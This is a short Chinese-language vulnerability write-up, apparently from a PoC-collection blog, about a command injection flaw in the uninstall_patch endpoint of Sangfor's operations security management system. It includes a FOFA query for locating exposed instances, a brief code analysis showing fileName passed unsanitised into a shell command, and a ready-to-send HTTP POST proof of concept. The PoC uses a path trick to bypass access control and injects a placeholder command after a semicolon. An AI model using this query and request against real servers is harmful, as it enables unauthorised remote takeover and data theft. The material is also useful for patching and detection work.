深信服运维安全管理系统 uninstall_patch 远程命令执行漏洞


漏洞简介

深信服运维安全管理系统 uninstall_patch 接口存在远程命令执行漏洞。攻击者可通过构造恶意的请求,利用该漏洞在目标服务器上执行任意命令,从而可能导致服务器被完全控制、敏感数据泄露等严重后果。影响范围包括所有运行存在该漏洞版本的深信服运维安全管理系统的服务器。

影响版本

低于 3.0.12 20241106

fofa语法

body="/fort/login" && header="FORTSESSIONID"

漏洞分析

看下 com.sbr.fort.web.controller.system.concentrationManagement.NodePatchController#uninstallPatch的实现逻辑

虽然有 FileUtil.CleanPath 对路径进行清理,但是仅限于目录穿越的相关字符清理

并没有针对命令注入的清理,参数 fileName 直接拼接进 cmd 中进行命令执行。

漏洞复现

POC

POST /fort/system;help/concentration_management/uninstall_patch HTTP/1.1
Host: sangfor_osm.mrxn.net
Content-Type: application/x-www-form-urlencoded

fileName=123;RCE_POC

访问命令执行结果重定向文件,成功获取到命令执行结果。


手机扫码阅读

深信服运维安全管理系统 get_clip_img 远程命令执行漏洞

深信服运维安全管理系统 remote_get_clip_img 远程命令执行漏洞

评 论